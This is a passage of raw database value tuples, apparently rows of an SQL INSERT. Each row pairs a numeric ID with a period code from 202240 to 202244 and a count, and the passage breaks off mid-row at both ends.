,7),(4765,1,'202240',7),(4776,1,'202240',7),(5101,1,'202240',7),(5137,1,'202240',7),(468,1,'202240',8),(477,1,'202240',8),(1584,1,'202240',8),(1588,1,'202240',8),(1610,1,'202240',8),(2148,1,'202240',8),(2154,1,'202240',8),(2296,1,'202240',8),(2658,1,'202240',8),(2775,1,'202240',8),(2813,1,'202240',8),(3102,1,'202240',8),(3107,1,'202240',8),(3479,1,'202240',8),(4660,1,'202240',8),(4703,1,'202240',8),(4706,1,'202240',8),(4756,1,'202240',8),(4762,1,'202240',8),(4771,1,'202240',8),(4983,1,'202240',8),(4996,1,'202240',8),(5071,1,'202240',8),(5131,1,'202240',8),(74,1,'202240',9),(108,1,'202240',9),(472,1,'202240',9),(485,1,'202240',9),(570,1,'202240',9),(1606,1,'202240',9),(2297,1,'202240',9),(3087,1,'202240',9),(4363,1,'202240',9),(4645,1,'202240',9),(4874,1,'202240',9),(5125,1,'202240',9),(469,1,'202240',10),(1604,1,'202240',10),(2769,1,'202240',10),(2911,1,'202240',10),(4412,1,'202240',10),(4457,1,'202240',10),(4520,1,'202240',10),(4654,1,'202240',10),(4697,1,'202240',10),(467,1,'202240',11),(486,1,'202240',11),(1602,1,'202240',11),(1612,1,'202240',11),(3006,1,'202240',11),(3066,1,'202240',11),(4338,1,'202240',11),(5134,1,'202240',11),(1596,1,'202240',12),(1728,1,'202240',12),(2309,1,'202240',12),(3060,1,'202240',12),(4694,1,'202240',12),(4930,1,'202240',12),(1722,1,'202240',13),(2503,1,'202240',13),(84,1,'202240',14),(1598,1,'202240',14),(1608,1,'202240',14),(1600,1,'202240',15),(3764,1,'202240',15),(3781,1,'202240',16),(87,1,'202240',17),(1594,1,'202240',17),(68,1,'202240',18),(1582,1,'202240',18),(89,1,'202240',19),(335,1,'202240',19),(76,1,'202240',21),(91,1,'202240',21),(2904,1,'202240',25),(1586,1,'202240',27),(3030,1,'202240',31),(1544,1,'202240',40),(72,1,'202240',41),(80,1,'202240',73),(9,1,'202240',614),(4792,1,'202241',1),(1699,1,'202241',2),(1705,1,'202241',2),(1747,1,'202241',2),(1749,1,'202241',2),(1768,1,'202241',2),(1772,1,'202241',2),(3109,1,'202241',2),(3253,1,'202241',2),(3257,1,'202241',2),(3290,1,'202241',2),(4517,1,'202241',2),(4542,1,'202241',2),(4765,1,'202241',2),(4771,1,'202241',2),(4858,1,'202241',2),(4977,1,'202241',2),(5122,1,'202241',2),(106,1,'202241',3),(110,1,'202241',3),(1713,1,'202241',3),(1715,1,'202241',3),(1732,1,'202241',3),(1734,1,'202241',3),(1745,1,'202241',3),(1766,1,'202241',3),(1770,1,'202241',3),(1776,1,'202241',3),(1780,1,'202241',3),(2148,1,'202241',3),(2150,1,'202241',3),(2252,1,'202241',3),(2297,1,'202241',3),(2558,1,'202241',3),(3023,1,'202241',3),(3092,1,'202241',3),(3240,1,'202241',3),(3247,1,'202241',3),(3259,1,'202241',3),(3261,1,'202241',3),(3267,1,'202241',3),(3269,1,'202241',3),(3273,1,'202241',3),(3731,1,'202241',3),(3746,1,'202241',3),(4363,1,'202241',3),(4400,1,'202241',3),(4514,1,'202241',3),(4546,1,'202241',3),(4587,1,'202241',3),(4591,1,'202241',3),(4612,1,'202241',3),(4694,1,'202241',3),(4750,1,'202241',3),(4768,1,'202241',3),(4797,1,'202241',3),(4866,1,'202241',3),(4870,1,'202241',3),(4874,1,'202241',3),(4888,1,'202241',3),(4893,1,'202241',3),(4897,1,'202241',3),(4976,1,'202241',3),(5067,1,'202241',3),(476,1,'202241',4),(478,1,'202241',4),(485,1,'202241',4),(1695,1,'202241',4),(1697,1,'202241',4),(1701,1,'202241',4),(1703,1,'202241',4),(1709,1,'202241',4),(1711,1,'202241',4),(1730,1,'202241',4),(1739,1,'202241',4),(1741,1,'202241',4),(1743,1,'202241',4),(1774,1,'202241',4),(1782,1,'202241',4),(2156,1,'202241',4),(2248,1,'202241',4),(2293,1,'202241',4),(2804,1,'202241',4),(2813,1,'202241',4),(3087,1,'202241',4),(3104,1,'202241',4),(3127,1,'202241',4),(3245,1,'202241',4),(3265,1,'202241',4),(3275,1,'202241',4),(3278,1,'202241',4),(3280,1,'202241',4),(3282,1,'202241',4),(3297,1,'202241',4),(3307,1,'202241',4),(3316,1,'202241',4),(3727,1,'202241',4),(3738,1,'202241',4),(4275,1,'202241',4),(4382,1,'202241',4),(4529,1,'202241',4),(4685,1,'202241',4),(4697,1,'202241',4),(4741,1,'202241',4),(4759,1,'202241',4),(4878,1,'202241',4),(4980,1,'202241',4),(4983,1,'202241',4),(4996,1,'202241',4),(5046,1,'202241',4),(5050,1,'202241',4),(5054,1,'202241',4),(471,1,'202241',5),(473,1,'202241',5),(477,1,'202241',5),(1720,1,'202241',5),(1724,1,'202241',5),(1728,1,'202241',5),(1751,1,'202241',5),(1778,1,'202241',5),(2063,1,'202241',5),(2152,1,'202241',5),(2154,1,'202241',5),(2161,1,'202241',5),(2165,1,'202241',5),(2178,1,'202241',5),(2748,1,'202241',5),(2956,1,'202241',5),(2964,1,'202241',5),(2991,1,'202241',5),(2993,1,'202241',5),(3004,1,'202241',5),(3005,1,'202241',5),(3034,1,'202241',5),(3063,1,'202241',5),(3090,1,'202241',5),(3117,1,'202241',5),(3229,1,'202241',5),(3251,1,'202241',5),(3263,1,'202241',5),(3285,1,'202241',5),(3313,1,'202241',5),(3482,1,'202241',5),(3531,1,'202241',5),(3541,1,'202241',5),(3724,1,'202241',5),(3735,1,'202241',5),(3771,1,'202241',5),(3774,1,'202241',5),(4301,1,'202241',5),(4332,1,'202241',5),(4341,1,'202241',5),(4368,1,'202241',5),(4373,1,'202241',5),(4432,1,'202241',5),(4440,1,'202241',5),(4454,1,'202241',5),(4524,1,'202241',5),(4556,1,'202241',5),(4608,1,'202241',5),(4654,1,'202241',5),(4668,1,'202241',5),(4681,1,'202241',5),(4691,1,'202241',5),(4709,1,'202241',5),(4712,1,'202241',5),(4744,1,'202241',5),(4747,1,'202241',5),(4756,1,'202241',5),(4762,1,'202241',5),(4802,1,'202241',5),(4883,1,'202241',5),(4930,1,'202241',5),(5020,1,'202241',5),(5042,1,'202241',5),(5128,1,'202241',5),(5131,1,'202241',5),(5140,1,'202241',5),(335,1,'202241',6),(469,1,'202241',6),(474,1,'202241',6),(480,1,'202241',6),(487,1,'202241',6),(1584,1,'202241',6),(1590,1,'202241',6),(1604,1,'202241',6),(1726,1,'202241',6),(1737,1,'202241',6),(2751,1,'202241',6),(2801,1,'202241',6),(2965,1,'202241',6),(2989,1,'202241',6),(3006,1,'202241',6),(3027,1,'202241',6),(3045,1,'202241',6),(3079,1,'202241',6),(3083,1,'202241',6),(3096,1,'202241',6),(3097,1,'202241',6),(3249,1,'202241',6),(3479,1,'202241',6),(3486,1,'202241',6),(3534,1,'202241',6),(3714,1,'202241',6),(3749,1,'202241',6),(4357,1,'202241',6),(4377,1,'202241',6),(4396,1,'202241',6),(4436,1,'202241',6),(4444,1,'202241',6),(4566,1,'202241',6),(4582,1,'202241',6),(4648,1,'202241',6),(4688,1,'202241',6),(4703,1,'202241',6),(4722,1,'202241',6),(4862,1,'202241',6),(5024,1,'202241',6),(5033,1,'202241',6),(5058,1,'202241',6),(5071,1,'202241',6),(5101,1,'202241',6),(5153,1,'202241',6),(76,1,'202241',7),(468,1,'202241',7),(472,1,'202241',7),(479,1,'202241',7),(482,1,'202241',7),(483,1,'202241',7),(486,1,'202241',7),(1707,1,'202241',7),(1722,1,'202241',7),(2296,1,'202241',7),(2609,1,'202241',7),(2775,1,'202241',7),(3038,1,'202241',7),(3041,1,'202241',7),(3243,1,'202241',7),(3438,1,'202241',7),(3489,1,'202241',7),(3721,1,'202241',7),(3742,1,'202241',7),(3752,1,'202241',7),(3777,1,'202241',7),(4326,1,'202241',7),(4335,1,'202241',7),(4387,1,'202241',7),(4391,1,'202241',7),(4424,1,'202241',7),(4428,1,'202241',7),(4448,1,'202241',7),(4651,1,'202241',7),(4657,1,'202241',7),(4660,1,'202241',7),(4753,1,'202241',7),(4988,1,'202241',7),(5037,1,'202241',7),(5134,1,'202241',7),(5157,1,'202241',7),(5163,1,'202241',7),(488,1,'202241',8),(1606,1,'202241',8),(1614,1,'202241',8),(2617,1,'202241',8),(3072,1,'202241',8),(3124,1,'202241',8),(3226,1,'202241',8),(3271,1,'202241',8),(3430,1,'202241',8),(3498,1,'202241',8),(3710,1,'202241',8),(4329,1,'202241',8),(4412,1,'202241',8),(4551,1,'202241',8),(4776,1,'202241',8),(5080,1,'202241',8),(5125,1,'202241',8),(481,1,'202241',9),(570,1,'202241',9),(1592,1,'202241',9),(1600,1,'202241',9),(1718,1,'202241',9),(2159,1,'202241',9),(2457,1,'202241',9),(2704,1,'202241',9),(3060,1,'202241',9),(3066,1,'202241',9),(4338,1,'202241',9),(4404,1,'202241',9),(4408,1,'202241',9),(5028,1,'202241',9),(5062,1,'202241',9),(5137,1,'202241',9),(102,1,'202241',10),(467,1,'202241',10),(484,1,'202241',10),(2309,1,'202241',10),(2658,1,'202241',10),(2769,1,'202241',10),(3102,1,'202241',10),(3287,1,'202241',10),(4323,1,'202241',10),(4420,1,'202241',10),(4674,1,'202241',10),(4677,1,'202241',10),(4706,1,'202241',10),(74,1,'202241',11),(84,1,'202241',11),(3107,1,'202241',11),(3781,1,'202241',11),(4416,1,'202241',11),(4520,1,'202241',11),(5076,1,'202241',11),(5146,1,'202241',11),(87,1,'202241',12),(108,1,'202241',12),(1594,1,'202241',12),(1598,1,'202241',12),(2911,1,'202241',12),(4238,1,'202241',12),(4645,1,'202241',12),(470,1,'202241',13),(1588,1,'202241',13),(1596,1,'202241',13),(3069,1,'202241',13),(4457,1,'202241',13),(1608,1,'202241',14),(1612,1,'202241',14),(2809,1,'202241',14),(4663,1,'202241',14),(1610,1,'202241',15),(2503,1,'202241',15),(4700,1,'202241',15),(89,1,'202241',17),(91,1,'202241',20),(1602,1,'202241',20),(3764,1,'202241',20),(68,1,'202241',22),(2904,1,'202241',27),(1582,1,'202241',28),(1586,1,'202241',31),(3030,1,'202241',37),(72,1,'202241',41),(1544,1,'202241',58),(80,1,'202241',59),(9,1,'202241',709),(106,1,'202242',1),(1707,1,'202242',1),(1782,1,'202242',1),(3079,1,'202242',1),(4651,1,'202242',1),(110,1,'202242',2),(1592,1,'202242',2),(1697,1,'202242',2),(1705,1,'202242',2),(1730,1,'202242',2),(1732,1,'202242',2),(1734,1,'202242',2),(1741,1,'202242',2),(2293,1,'202242',2),(2617,1,'202242',2),(3247,1,'202242',2),(3249,1,'202242',2),(3531,1,'202242',2),(4436,1,'202242',2),(4744,1,'202242',2),(4870,1,'202242',2),(102,1,'202242',3),(1590,1,'202242',3),(1699,1,'202242',3),(1720,1,'202242',3),(1739,1,'202242',3),(1747,1,'202242',3),(1749,1,'202242',3),(1768,1,'202242',3),(1770,1,'202242',3),(2063,1,'202242',3),(2156,1,'202242',3),(2161,1,'202242',3),(3063,1,'202242',3),(3104,1,'202242',3),(3229,1,'202242',3),(3245,1,'202242',3),(3251,1,'202242',3),(3253,1,'202242',3),(3265,1,'202242',3),(3486,1,'202242',3),(3724,1,'202242',3),(3727,1,'202242',3),(3738,1,'202242',3),(3749,1,'202242',3),(3777,1,'202242',3),(4238,1,'202242',3),(4332,1,'202242',3),(4357,1,'202242',3),(4377,1,'202242',3),(4387,1,'202242',3),(4404,1,'202242',3),(4424,1,'202242',3),(4448,1,'202242',3),(4591,1,'202242',3),(4608,1,'202242',3),(4648,1,'202242',3),(4668,1,'202242',3),(4756,1,'202242',3),(4797,1,'202242',3),(4862,1,'202242',3),(4874,1,'202242',3),(4883,1,'202242',3),(1703,1,'202242',4),(1709,1,'202242',4),(1715,1,'202242',4),(1718,1,'202242',4),(1737,1,'202242',4),(1743,1,'202242',4),(1772,1,'202242',4),(1776,1,'202242',4),(1778,1,'202242',4),(2152,1,'202242',4),(2159,1,'202242',4),(2165,1,'202242',4),(2296,1,'202242',4),(2801,1,'202242',4),(2956,1,'202242',4),(2989,1,'202242',4),(2991,1,'202242',4),(3004,1,'202242',4),(3038,1,'202242',4),(3041,1,'202242',4),(3096,1,'202242',4),(3097,1,'202242',4),(3124,1,'202242',4),(3226,1,'202242',4),(3243,1,'202242',4),(3261,1,'202242',4),(3267,1,'202242',4),(3269,1,'202242',4),(3271,1,'202242',4),(3273,1,'202242',4),(3278,1,'202242',4),(3280,1,'202242',4),(3282,1,'202242',4),(3285,1,'202242',4),(3287,1,'202242',4),(3438,1,'202242',4),(3541,1,'202242',4),(3714,1,'202242',4),(4301,1,'202242',4),(4326,1,'202242',4),(4391,1,'202242',4),(4396,1,'202242',4),(4400,1,'202242',4),(4408,1,'202242',4),(4428,1,'202242',4),(4432,1,'202242',4),(4440,1,'202242',4),(4542,1,'202242',4),(4551,1,'202242',4),(4582,1,'202242',4),(4654,1,'202242',4),(4657,1,'202242',4),(4660,1,'202242',4),(4688,1,'202242',4),(4753,1,'202242',4),(4762,1,'202242',4),(4768,1,'202242',4),(4858,1,'202242',4),(4866,1,'202242',4),(4893,1,'202242',4),(4983,1,'202242',4),(5033,1,'202242',4),(476,1,'202242',5),(478,1,'202242',5),(479,1,'202242',5),(480,1,'202242',5),(481,1,'202242',5),(483,1,'202242',5),(486,1,'202242',5),(488,1,'202242',5),(1584,1,'202242',5),(1604,1,'202242',5),(1701,1,'202242',5),(1713,1,'202242',5),(1745,1,'202242',5),(1774,1,'202242',5),(2154,1,'202242',5),(2178,1,'202242',5),(2252,1,'202242',5),(2558,1,'202242',5),(2609,1,'202242',5),(2769,1,'202242',5),(2775,1,'202242',5),(2813,1,'202242',5),(2964,1,'202242',5),(2993,1,'202242',5),(3005,1,'202242',5),(3023,1,'202242',5),(3027,1,'202242',5),(3045,1,'202242',5),(3087,1,'202242',5),(3090,1,'202242',5),(3109,1,'202242',5),(3240,1,'202242',5),(3257,1,'202242',5),(3259,1,'202242',5),(3275,1,'202242',5),(3290,1,'202242',5),(3297,1,'202242',5),(3316,1,'202242',5),(3430,1,'202242',5),(3479,1,'202242',5),(3710,1,'202242',5),(3721,1,'202242',5),(3731,1,'202242',5),(3742,1,'202242',5),(4363,1,'202242',5),(4368,1,'202242',5),(4373,1,'202242',5),(4382,1,'202242',5),(4444,1,'202242',5),(4546,1,'202242',5),(4556,1,'202242',5),(4612,1,'202242',5),(4681,1,'202242',5),(4691,1,'202242',5),(4712,1,'202242',5),(4741,1,'202242',5),(4759,1,'202242',5),(4771,1,'202242',5),(4776,1,'202242',5),(4802,1,'202242',5),(4878,1,'202242',5),(4897,1,'202242',5),(4977,1,'202242',5),(4980,1,'202242',5),(5020,1,'202242',5),(5024,1,'202242',5),(5037,1,'202242',5),(5042,1,'202242',5),(5046,1,'202242',5),(5050,1,'202242',5),(5062,1,'202242',5),(5067,1,'202242',5),(5080,1,'202242',5),(5140,1,'202242',5),(467,1,'202242',6),(469,1,'202242',6),(471,1,'202242',6),(482,1,'202242',6),(484,1,'202242',6),(1711,1,'202242',6),(1726,1,'202242',6),(1751,1,'202242',6),(1780,1,'202242',6),(2150,1,'202242',6),(2248,1,'202242',6),(2457,1,'202242',6),(2658,1,'202242',6),(2748,1,'202242',6),(2911,1,'202242',6),(2965,1,'202242',6),(3072,1,'202242',6),(3092,1,'202242',6),(3107,1,'202242',6),(3117,1,'202242',6),(3127,1,'202242',6),(3307,1,'202242',6),(3489,1,'202242',6),(3498,1,'202242',6),(3735,1,'202242',6),(3746,1,'202242',6),(4323,1,'202242',6),(4329,1,'202242',6),(4335,1,'202242',6),(4514,1,'202242',6),(4524,1,'202242',6),(4685,1,'202242',6),(4722,1,'202242',6),(4747,1,'202242',6),(4765,1,'202242',6),(4792,1,'202242',6),(4888,1,'202242',6),(4988,1,'202242',6),(5028,1,'202242',6),(5054,1,'202242',6),(5058,1,'202242',6),(5071,1,'202242',6),(5101,1,'202242',6),(468,1,'202242',7),(474,1,'202242',7),(477,1,'202242',7),(485,1,'202242',7),(570,1,'202242',7),(1596,1,'202242',7),(1724,1,'202242',7),(1728,1,'202242',7),(2297,1,'202242',7),(2751,1,'202242',7),(2804,1,'202242',7),(3034,1,'202242',7),(3083,1,'202242',7),(3263,1,'202242',7),(3313,1,'202242',7),(3482,1,'202242',7),(3771,1,'202242',7),(3774,1,'202242',7),(4275,1,'202242',7),(4517,1,'202242',7),(4566,1,'202242',7),(4697,1,'202242',7),(4703,1,'202242',7),(4750,1,'202242',7),(5122,1,'202242',7),(108,1,'202242',8),(335,1,'202242',8),(473,1,'202242',8),(1598,1,'202242',8),(1614,1,'202242',8),(1695,1,'202242',8),(1722,1,'202242',8),(1766,1,'202242',8),(3752,1,'202242',8),(4341,1,'202242',8),(4420,1,'202242',8),(4454,1,'202242',8),(4529,1,'202242',8),(4694,1,'202242',8),(4709,1,'202242',8),(5146,1,'202242',8),(5153,1,'202242',8),(5157,1,'202242',8),(74,1,'202242',9),(472,1,'202242',9),(1600,1,'202242',9),(2309,1,'202242',9),(3006,1,'202242',9),(4412,1,'202242',9),(4457,1,'202242',9),(5076,1,'202242',9),(5128,1,'202242',9),(487,1,'202242',10),(2148,1,'202242',10),(3534,1,'202242',10),(4416,1,'202242',10),(4663,1,'202242',10),(4674,1,'202242',10),(4706,1,'202242',10),(4976,1,'202242',10),(1606,1,'202242',11),(1608,1,'202242',11),(2704,1,'202242',11),(3069,1,'202242',11),(3102,1,'202242',11),(4645,1,'202242',11),(4930,1,'202242',11),(5134,1,'202242',11),(470,1,'202242',12),(1610,1,'202242',12),(2503,1,'202242',12),(3060,1,'202242',12),(4700,1,'202242',12),(4996,1,'202242',12),(5131,1,'202242',12),(5137,1,'202242',12),(1588,1,'202242',13),(2809,1,'202242',13),(3066,1,'202242',13),(4520,1,'202242',13),(4677,1,'202242',13),(87,1,'202242',15),(4338,1,'202242',15),(4587,1,'202242',15),(1602,1,'202242',16),(84,1,'202242',17),(3764,1,'202242',17),(3781,1,'202242',17),(1586,1,'202242',18),(3030,1,'202242',18),(1594,1,'202242',19),(1582,1,'202242',20),(68,1,'202242',22),(1544,1,'202242',22),(76,1,'202242',23),(1612,1,'202242',23),(5125,1,'202242',23),(89,1,'202242',24),(91,1,'202242',24),(5163,1,'202242',25),(2904,1,'202242',37),(72,1,'202242',40),(80,1,'202242',64),(9,1,'202242',657),(3271,1,'202243',1),(3297,1,'202243',1),(4444,1,'202243',1),(102,1,'202243',2),(480,1,'202243',2),(2161,1,'202243',2),(2293,1,'202243',2),(2911,1,'202243',2),(2956,1,'202243',2),(3006,1,'202243',2),(3041,1,'202243',2),(3092,1,'202243',2),(3479,1,'202243',2),(3482,1,'202243',2),(3774,1,'202243',2),(4275,1,'202243',2),(4335,1,'202243',2),(4341,1,'202243',2),(4396,1,'202243',2),(4404,1,'202243',2),(4432,1,'202243',2),(4551,1,'202243',2),(4556,1,'202243',2),(4685,1,'202243',2),(4688,1,'202243',2),(4858,1,'202243',2),(4977,1,'202243',2),(5020,1,'202243',2),(5157,1,'202243',2),(110,1,'202243',3),(467,1,'202243',3),(476,1,'202243',3),(477,1,'202243',3),(484,1,'202243',3),(488,1,'202243',3),(1592,1,'202243',3),(1699,1,'202243',3),(1705,1,'202243',3),(1720,1,'202243',3),(1745,1,'202243',3),(1747,1,'202243',3),(1751,1,'202243',3),(2751,1,'202243',3),(2993,1,'202243',3),(3038,1,'202243',3),(3097,1,'202243',3),(3247,1,'202243',3),(3438,1,'202243',3),(3534,1,'202243',3),(3710,1,'202243',3),(3721,1,'202243',3),(3742,1,'202243',3),(3771,1,'202243',3),(4368,1,'202243',3),(4440,1,'202243',3),(4517,1,'202243',3),(4546,1,'202243',3),(4566,1,'202243',3),(4612,1,'202243',3),(4681,1,'202243',3),(4712,1,'202243',3),(4741,1,'202243',3),(4744,1,'202243',3),(4753,1,'202243',3),(4765,1,'202243',3),(4776,1,'202243',3),(4866,1,'202243',3),(4893,1,'202243',3),(4980,1,'202243',3),(5028,1,'202243',3),(5033,1,'202243',3),(5101,1,'202243',3),(5146,1,'202243',3),(5153,1,'202243',3),(471,1,'202243',4),(478,1,'202243',4),(479,1,'202243',4),(481,1,'202243',4),(483,1,'202243',4),(570,1,'202243',4),(1604,1,'202243',4),(1606,1,'202243',4),(1715,1,'202243',4),(1726,1,'202243',4),(1739,1,'202243',4),(1741,1,'202243',4),(1743,1,'202243',4),(1776,1,'202243',4),(1780,1,'202243',4),(2150,1,'202243',4),(2156,1,'202243',4),(2165,1,'202243',4),(2558,1,'202243',4),(2617,1,'202243',4),(2658,1,'202243',4),(2801,1,'202243',4),(2991,1,'202243',4),(3004,1,'202243',4),(3023,1,'202243',4),(3090,1,'202243',4),(3096,1,'202243',4),(3107,1,'202243',4),(3127,1,'202243',4),(3263,1,'202243',4),(3278,1,'202243',4),(3280,1,'202243',4),(3287,1,'202243',4),(3307,1,'202243',4),(3498,1,'202243',4),(3714,1,'202243',4),(3727,1,'202243',4),(3735,1,'202243',4),(3752,1,'202243',4),(3777,1,'202243',4),(4326,1,'202243',4),(4329,1,'202243',4),(4332,1,'202243',4),(4357,1,'202243',4),(4363,1,'202243',4),(4373,1,'202243',4),(4382,1,'202243',4),(4391,1,'202243',4),(4400,1,'202243',4),(4408,1,'202243',4),(4420,1,'202243',4),(4436,1,'202243',4),(4514,1,'202243',4),(4524,1,'202243',4),(4529,1,'202243',4),(4582,1,'202243',4),(4587,1,'202243',4),(4591,1,'202243',4),(4648,1,'202243',4),(4654,1,'202243',4),(4657,1,'202243',4),(4694,1,'202243',4),(4697,1,'202243',4),(4709,1,'202243',4),(4722,1,'202243',4),(4756,1,'202243',4),(4768,1,'202243',4),(4771,1,'202243',4),(4802,1,'202243',4),(4862,1,'202243',4),(4874,1,'202243',4),(4883,1,'202243',4),(4888,1,'202243',4),(4897,1,'202243',4),(4976,1,'202243',4),(4983,1,'202243',4),(4996,1,'202243',4),(5024,1,'202243',4),(5037,1,'202243',4),(5042,1,'202243',4),(5054,1,'202243',4),(5128,1,'202243',4),(5140,1,'202243',4),(106,1,'202243',5),(482,1,'202243',5),(1590,1,'202243',5),(1695,1,'202243',5),(1701,1,'202243',5),(1707,1,'202243',5),(1709,1,'202243',5),(1732,1,'202243',5),(1737,1,'202243',5),(1782,1,'202243',5),(2252,1,'202243',5),(2297,1,'202243',5),(2704,1,'202243',5),(2769,1,'202243',5),(2775,1,'202243',5),(2804,1,'202243',5),(2813,1,'202243',5),(3027,1,'202243',5),(3034,1,'202243',5),(3045,1,'202243',5),(3063,1,'202243',5),(3079,1,'202243',5),(3087,1,'202243',5),(3124,1,'202243',5),(3226,1,'202243',5),(3229,1,'202243',5),(3240,1,'202243',5),(3243,1,'202243',5),(3249,1,'202243',5),(3253,1,'202243',5),(3257,1,'202243',5),(3259,1,'202243',5),(3261,1,'202243',5),(3267,1,'202243',5),(3269,1,'202243',5),(3282,1,'202243',5),(3313,1,'202243',5),(3316,1,'202243',5),(3486,1,'202243',5),(3489,1,'202243',5),(3738,1,'202243',5),(3746,1,'202243',5),(4238,1,'202243',5),(4301,1,'202243',5),(4323,1,'202243',5),(4377,1,'202243',5),(4454,1,'202243',5),(4542,1,'202243',5),(4660,1,'202243',5),(4668,1,'202243',5),(4703,1,'202243',5),(4750,1,'202243',5),(4759,1,'202243',5),(4878,1,'202243',5),(4988,1,'202243',5),(5067,1,'202243',5),(5080,1,'202243',5),(5122,1,'202243',5),(5131,1,'202243',5),(472,1,'202243',6),(485,1,'202243',6),(486,1,'202243',6),(1584,1,'202243',6),(1730,1,'202243',6),(1734,1,'202243',6),(1772,1,'202243',6),(1778,1,'202243',6),(2063,1,'202243',6),(2178,1,'202243',6),(2248,1,'202243',6),(2609,1,'202243',6),(2748,1,'202243',6),(2964,1,'202243',6),(2965,1,'202243',6),(2989,1,'202243',6),(3005,1,'202243',6),(3072,1,'202243',6),(3104,1,'202243',6),(3109,1,'202243',6),(3245,1,'202243',6),(3275,1,'202243',6),(3285,1,'202243',6),(3531,1,'202243',6),(3724,1,'202243',6),(3731,1,'202243',6),(3749,1,'202243',6),(4412,1,'202243',6),(4416,1,'202243',6),(4424,1,'202243',6),(4428,1,'202243',6),(4448,1,'202243',6),(4651,1,'202243',6),(4691,1,'202243',6),(4762,1,'202243',6),(4792,1,'202243',6),(5046,1,'202243',6),(5058,1,'202243',6),(5062,1,'202243',6),(5134,1,'202243',6),(5137,1,'202243',6),(335,1,'202243',7),(469,1,'202243',7),(470,1,'202243',7),(1588,1,'202243',7),(1608,1,'202243',7),(1614,1,'202243',7),(1697,1,'202243',7),(1703,1,'202243',7),(1711,1,'202243',7),(1718,1,'202243',7),(1768,1,'202243',7),(1774,1,'202243',7),(2148,1,'202243',7),(2152,1,'202243',7),(2154,1,'202243',7),(3102,1,'202243',7),(3117,1,'202243',7),(3251,1,'202243',7),(3265,1,'202243',7),(3273,1,'202243',7),(3290,1,'202243',7),(3430,1,'202243',7),(3541,1,'202243',7),(4387,1,'202243',7),(4747,1,'202243',7),(4797,1,'202243',7),(4870,1,'202243',7),(5125,1,'202243',7),(1596,1,'202243',8),(1766,1,'202243',8),(2159,1,'202243',8),(2309,1,'202243',8),(4608,1,'202243',8),(4677,1,'202243',8),(5050,1,'202243',8),(5071,1,'202243',8),(84,1,'202243',9),(87,1,'202243',9),(473,1,'202243',9),(487,1,'202243',9),(1600,1,'202243',9),(1713,1,'202243',9),(1728,1,'202243',9),(1749,1,'202243',9),(2296,1,'202243',9),(2809,1,'202243',9),(3083,1,'202243',9),(4674,1,'202243',9),(4706,1,'202243',9),(5076,1,'202243',9),(74,1,'202243',10),(1724,1,'202243',10),(1770,1,'202243',10),(3060,1,'202243',10),(4645,1,'202243',10),(4663,1,'202243',10),(4930,1,'202243',10),(468,1,'202243',11),(1612,1,'202243',11),(2457,1,'202243',11),(3066,1,'202243',11),(3069,1,'202243',11),(3781,1,'202243',11),(4338,1,'202243',11),(4520,1,'202243',11),(4457,1,'202243',12),(91,1,'202243',13),(108,1,'202243',13),(474,1,'202243',13),(1544,1,'202243',13),(1598,1,'202243',13),(1610,1,'202243',13),(5163,1,'202243',13),(1582,1,'202243',14),(2503,1,'202243',14),(4700,1,'202243',14),(1722,1,'202243',15),(3764,1,'202243',15),(68,1,'202243',16),(1602,1,'202243',16),(2904,1,'202243',16),(1594,1,'202243',17),(3030,1,'202243',17),(76,1,'202243',18),(89,1,'202243',19),(1586,1,'202243',32),(72,1,'202243',42),(80,1,'202243',48),(9,1,'202243',559),(106,1,'202244',1),(110,1,'202244',1),(1697,1,'202244',1),(1703,1,'202244',1),(1705,1,'202244',1),(1720,1,'202244',1),(1734,1,'202244',1),(1778,1,'202244',1),(2148,1,'202244',1),(2704,1,'202244',1),(2989,1,'202244',1),(3034,1,'202244',1),(3079,1,'202244',1),(3109,1,'202244',1),(3243,1,'202244',1),(3249,1,'202244',1),(3251,1,'202244',1),(3263,1,'202244',1),(3749,1,'202244',1),(4363,1,'202244',1),(4373,1,'202244',1),(4424,1,'202244',1),(4432,1,'202244',1),(4436,1,'202244',1),(4744,1,'202244',1),(4792,1,'202244',1),(4797,1,'202244',1),(4858,1,'202244',1),(4862,1,'202244',1),(4866,1,'202244',1),(4874,1,'202244',1),(1699,1,'202244',2),(1701,1,'202244',2),(1707,1,'202244',2),(1713,1,'202244',2),(1715,1,'202244',2),(1741,1,'202244',2),(1747,1,'202244',2),(1749,1,'202244',2),(1751,1,'202244',2),(1770,1,'202244',2),(1772,1,'202244',2),(1776,1,'202244',2),(1780,1,'202244',2),(2063,1,'202244',2),(2150,1,'202244',2),(2152,1,'202244',2),(2156,1,'202244',2),(2165,1,'202244',2),(2248,1,'202244',2),(2558,1,'202244',2),(2617,1,'202244',2),(2658,1,'202244',2),(2775,1,'202244',2),(2813,1,'202244',2),(2991,1,'202244',2),(2993,1,'202244',2),(3027,1,'202244',2),(3045,1,'202244',2),(3066,1,'202244',2),(3090,1,'202244',2),(3096,1,'202244',2),(3245,1,'202244',2),(3253,1,'202244',2),(3257,1,'202244',2),(3265,1,'202244',2),(3267,1,'202244',2),(3269,1,'202244',2),(3275,1,'202244',2),(3278,1,'202244',2),(3280,1,'202244',2),(3285,1,'202244',2),(3534,1,'202244',2),(3721,1,'202244',2),(3727,1,'202244',2),(3735,1,'202244',2),(3738,1,'202244',2),(3746,1,'202244',2),(4275,1,'202244',2),(4329,1,'202244',2),(4368,1,'202244',2),(4382,1,'202244',2),(4391,1,'202244',2),(4408,1,'202244',2),(4440,1,'202244',2),(4514,1,'202244',2),(4551,1,'202244',2),(4566,1,'202244',2),(4587,1,'202244',2),(4591,1,'202244',2),(4612,1,'202244',2),(4648,1,'202244',2),(4663,1,'202244',2),(4668,1,'202244',2),(4688,1,'202244',2),(4691,1,'202244',2),(4697,1,'202244',2),(4706,1,'202244',2),(4712,1,'202244',2),(4883,1,'202244',2),(4983,1,'202244',2),(5020,1,'202244',2),(5042,1,'202244',2),(483,1,'202244',3),(484,1,'202244',3),(1590,1,'202244',3),(1709,1,'202244',3),(1711,1,'202244',3),(1718,1,'202244',3),(1726,1,'202244',3),(1730,1,'202244',3),(1732,1,'202244',3),(1766,1,'202244',3),(1768,1,'202244',3),(1782,1,'202244',3),(2154,1,'202244',3),(2161,1,'202244',3),(2178,1,'202244',3),(2252,1,'202244',3),(2293,1,'202244',3),(2297,1,'202244',3),(3063,1,'202244',3),(3092,1,'202244',3),(3097,1,'202244',3),(3226,1,'202244',3),(3229,1,'202244',3),(3240,1,'202244',3),(3259,1,'202244',3),(3261,1,'202244',3),(3271,1,'202244',3),(3290,1,'202244',3),(3307,1,'202244',3),(3316,1,'202244',3),(3438,1,'202244',3),(3479,1,'202244',3),(3486,1,'202244',3),(3731,1,'202244',3)